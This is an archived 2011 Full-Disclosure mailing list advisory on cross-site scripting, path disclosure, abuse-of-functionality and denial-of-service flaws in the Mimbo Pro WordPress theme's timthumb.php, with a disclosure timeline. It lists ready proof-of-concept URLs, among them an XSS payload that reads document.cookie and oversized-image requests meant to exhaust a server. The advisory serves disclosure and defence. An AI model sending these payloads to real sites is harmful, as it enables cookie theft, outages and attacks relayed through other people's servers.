[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Vulnerabilities in Mimbo Pro theme for WordPress
- To: <submissions@xxxxxxxxxxxxxxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] Vulnerabilities in Mimbo Pro theme for WordPress
- From: "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx>
- Date: Thu, 14 Apr 2011 21:44:14 +0300
Hello list!
I want to warn you about Cross-Site Scripting, Full path disclosure, Abuse
of Functionality and Denial of Service vulnerabilities in Mimbo Pro theme
for WordPress. It's commercial theme for WP by developer of TimThumb.
-------------------------
Affected products:
-------------------------
Vulnerable are Mimbo Pro 2.3.1 and previous versions. XSS is possible only
in old versions of the theme. After my informing, developer have fixed
almost all vulnerabilities.
----------
Details:
----------
XSS (WASC-08):
http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E
Full path disclosure (WASC-13):
http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site
http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site/page.png&h=1111111&w=1
http://site/wp-content/themes/mimbopro/
And also tens of php-scripts of the theme in folder /mimbopro/ and all
subfolders.
Abuse of Functionality (WASC-42):
http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site&h=1&w=1
DoS (WASC-10):
http://site/wp-content/themes/mimbopro/scripts/timthumb.php?src=http://site/big_file&h=1&w=1
About such AoF and DoS vulnerabilities I wrote in article Using of the sites
for attacks on other sites
(http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html).
------------
Timeline:
------------
2011.02.08 - informed developer about vulnerabilities in TimThumb.
2011.02.08 - announced at my site.
2011.02.09 - informed developer about vulnerabilities in Mimbo Pro.
2011.02.13 - developer released TimThumb 1.25 and begun updating
TimThumb in all his themes.
2011.04.14 - disclosed at my site.
I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/4913/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/